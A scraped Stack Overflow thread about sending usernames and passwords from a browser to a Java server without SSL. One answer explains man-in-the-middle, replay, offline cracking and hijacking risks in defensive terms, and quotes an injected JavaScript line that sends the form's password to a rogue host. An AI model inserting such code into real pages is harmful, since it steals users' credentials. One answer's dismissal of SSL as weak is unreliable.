I have a web application (Java) that I am trying to launch. The user needs to login to the system to use the features. So there are two parts to this application:
1) User Registration
2) Login
My concern is how secure is my method of transferring username/password data from the web browser to the server.
Registration
I am very lost on this one as I am not really sure how to securely send data from the web browser to the server.
Login
I have the following setup:
<< Client >> ------------------------------------------------------<< Server >>
[Request a token] ------------------------------------------------------------->>
<<--------------[Sends a randomely generated token from the session ID]
[Client Computes hashedSecret = SHA1(token + SHA1(password))]
[Send Array:[username, hashedSecret]]----------------------------------->>
[Server queries SHA1(password) for username from the database]
[Server putes expectedSecret = SHA1(token + SHA1(password))]
[Server pares hashedSecret with expectedSecret]
What I would like to know is how to securely register users and if my login is secure enough.
Thanks
I have a web application (Java) that I am trying to launch. The user needs to login to the system to use the features. So there are two parts to this application:
1) User Registration
2) Login
My concern is how secure is my method of transferring username/password data from the web browser to the server.
Registration
I am very lost on this one as I am not really sure how to securely send data from the web browser to the server.
Login
I have the following setup:
<< Client >> ------------------------------------------------------<< Server >>
[Request a token] ------------------------------------------------------------->>
<<--------------[Sends a randomely generated token from the session ID]
[Client Computes hashedSecret = SHA1(token + SHA1(password))]
[Send Array:[username, hashedSecret]]----------------------------------->>
[Server queries SHA1(password) for username from the database]
[Server putes expectedSecret = SHA1(token + SHA1(password))]
[Server pares hashedSecret with expectedSecret]
What I would like to know is how to securely register users and if my login is secure enough.
Thanks
- 2 What's your expected threat? If you're only worried about packet sniffing while the data's on the wire, then use SSL and ignore anything fancy on your part - just send the user/pass as you would with any web request and SSL will ward off the sniffers. – Marc B Commented Jan 25, 2012 at 19:32
- HTTPS == HTTP + SSL your app will change from port 80 to 443 (if default conf) and will use more cpu time. but implementing your own handshake logic will as well. and yes, in theory, you are doing it correctly, if you add a random salt to the token generation. – japrescott Commented Jan 25, 2012 at 19:37
- The website I am launching the app on does not have a SSL certificate, yet. However, they are planning to obtain one. So till they get one, I have to use some sort of encryption/hash technique to transfer data to the server. I could e up with the login procedure but have no clue to how to secure registration process. Threats that I am concerned about are replay/man-in-the-middle attacks and sniffers. – Bashir Commented Jan 25, 2012 at 21:17
- 1 You can't prevent man-in-the-middle attacks without a trusted certificate. Period. Remended reading: stackoverflow./questions/6658557/… For a workaround take a look at aSSL: assl.sullof./assl/securityfaq.asp – user123444555621 Commented Jan 25, 2012 at 21:31
- Those links are very helpful, thanks – Bashir Commented Jan 25, 2012 at 22:59
3 Answers
Reset to default 9It seems … overly plex. Just use SSL, it is the industry standard and good enough for banks.
Whether it is "secure enough" is, of course, something only you can answer as the system owner. If your expected adversary is unskilled and unmotivated, and the impact of an authentication failure is low, then it is. If you are protecting anything of significant value, then it probably is not a sufficiently secure solution.
Here are a few attack vectors to which this approach would likely be vulnerable.
Man-in-the-middle attacks:
Client Eavesdropper Server
Requests token-------X----------------------->
<--------------------X-------------Sends token
Sends PW hash--------X
Relays client hash ------>
X<-----------Authenticates
An eavesdropper listens for the client's authentication response, and then relays it to the server. The server verifies its correctness and authenticates the eavesdropper.
Offline password hash attacks
An eavesdropper who can read messages between the client and server will have the token and the logic (from the JavaScript) used to generate the hash. Thus, the attacker will know H(token + H(password)), token, and H(x) where H is the cryptograph hash algorithm (SHA1).
The attacker can then run a dictionary attack against the client response to guess the password, where the attacker can attempt to crack the password offline using dictionary attacks and similar methods. Since the attacker does not need to authenticate against the server but can rather crack the password offline, moderate-weak passwords can be quickly cracked.
Modification of server messages in transit
The client has no assurance of the integrity of the server's messages, and the messages can potentially be modified in transit. For instance, a malicious intermediary can insert a line of JavaScript into the HTML page that intercepts the password through the DOM and sends it to a rogue server. (A rogue intermediary might, for example, insert new Image().src='http://www.rogueserver.xy/a.gif?password=' + document.forms[0].password.value into the form submit method.)
Replay attacks
If the server tokens repeat with sufficient frequency, an eavesdropper can capture a successful token/response pair. The attacker can then make a large number of token requests, waiting for a known token to be recycled. The attacker then replays the known token response to the server. The server pares the attacker's response against the expected response and authenticates the attacker.
Post-authentication attacks
After the session is authenticated, client and server messages continue to be sent in cleartext. The attacker might conduct a session hijacking attack, using the client's session cookie to pose as the authenticated client. The attacker might also intercept confidential data between the server and client, or change data in transit, promising the confidentiality, integrity, and non-repudiation of the client/server munication. For instance, the client might send a response to perform BenignAction, which the attacker changes in transit to GetSecretData. The attacker then reads the response ostensibly containing secret data.
This is all to say that the proposed method may not be much more secure than sending the password in clear text. If security is a concern, using SSL with a certificate from a trusted CA would (for practical intents) effectively prevent all of these attacks.
@Quentin posted that SSL is good, and what is used, in the industry today. It is the easiest of the security methods to implement, but for me it's only gets a grade of C or worse for being secure. Bank apps, and other sites, uses stronger security methods depending on the info you are trying to secure.
For instance, StackOverflow. uses standard POST forms to create users and secures the traffic via SSL. This is good enough for a site that only is a munity knowledgebase site. Example POST:
POST https://stackoverflow./users/login-or-signup/validation/track
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://stackoverflow./users/signup?returnurl=http%3a%2f%2fstackoverflow.%2fquestions%2f9008997%2fweb-authentication-how-to-securely-transfer-username-password-from-the-client
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: stackoverflow.
Content-Length: 240
Connection: Keep-Alive
Cache-Control: no-cache
isSignup=true&isLogin=false&isPassword=false&isAddLogin=false&hasCaptcha=false&fkey=asd231232s30b71ead6f8af06f93b85c&legalLinksShown=1&displayname=[MyScreeName]&email=[MyEmail]&password=[SOMEPASSWORD]&password2=[SOMEPASSWORD]&submitbutton=Sign
Banks, on the other hand, like the Wells Fargo App, will binary serialize, private client key encrypt, and SSL the form traffic. It is a bit like, "Security by Obscurity", but it is better than just SSL. My 2Cents. Cheers!